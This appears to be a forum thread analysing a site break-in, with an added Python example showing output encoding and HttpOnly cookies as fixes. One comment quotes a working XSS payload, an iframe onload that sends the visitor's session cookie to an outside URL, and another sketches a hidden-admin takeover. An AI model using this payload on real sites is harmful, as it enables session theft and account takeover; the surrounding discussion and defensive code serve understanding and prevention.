Not much on the details though. I'd like to know exactly how they did it. I'm betting they stole an admin user's session cookie.
-- smart, pretty, sane. pick two - georgeha
<iframe onload="window.location = 'http://my.site.com/pwned.html?cookie=' + document.cookie;" />
So that is echoed back to the user inside a table cell, and as it loads (iframe is used solely for the onload event handler) it broadcasts the cookie to whoever is interested.
I've not tried this or even thought about it too hard, but looking at the patch I can't see why this wouldn't work - specifically I'm not sure why a buffer overflow was mentioned at all.
I think buffer overflow was mentioned because somebody saw "%3F%4E" etc in the url and thought "I don't understand that, it must be a buffer overflow".
If it was originally linked to last measure or something similar then it was fairly un-subtle. Good way to announce "I've found a hole, ha ha", but not a good way to permanently take over the site.
A determined attacker could have just made themselves an admin user and modified the cabal box to not display their name. They could then have had weeks to do whatever they liked. Maybe they did.
Note to self. Add "http-only" flag to cookies. Not that it helps for Firefox.
-- smart, pretty, sane. pick two - georgeha
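As an added example (not code from the thread or from the site being discussed), here is Python showing the two fixes the comments point at: entity-encoding user text before echoing it into a table cell, and setting HttpOnly on the session cookie. The thread's iframe string is used only as a constructed test input; the parser-based check and all function names are assumptions of this example.

```python
import html
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Constructed test input: the iframe/onload string quoted in the thread,
# treated here purely as untrusted text to be displayed, never executed.
REFLECTED_INPUT = (
    "<iframe onload=\"window.location = 'http://my.site.com/pwned.html?cookie=' "
    "+ document.cookie;\" />"
)


def render_table_cell(user_text: str, encode: bool = True) -> str:
    """Echo user text inside a <td>; encode=False reproduces the vulnerable echo."""
    body = html.escape(user_text, quote=True) if encode else user_text
    return "<td>" + body + "</td>"


class _TagCollector(HTMLParser):
    """Records every element an HTML parser creates from the given markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.tags.append(tag)


def elements_in(markup: str) -> list:
    """Element names parsed from markup; shows whether the echo created a tag."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def session_cookie_header(session_id: str, secure: bool = True) -> str:
    """Set-Cookie value for the session cookie with HttpOnly (and Secure) set.

    HttpOnly keeps document.cookie from reading the value in browsers that
    honour the flag; it limits the damage of an XSS, it does not remove it.
    """
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["path"] = "/"
    cookie["session"]["secure"] = secure
    return cookie["session"].OutputString()
```

With encoding on, the cell parses to a single td element and the iframe text is shown literally; with encoding off, the parser produces the iframe element, which is the condition the thread describes.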
The long and short of it is that it's what we said.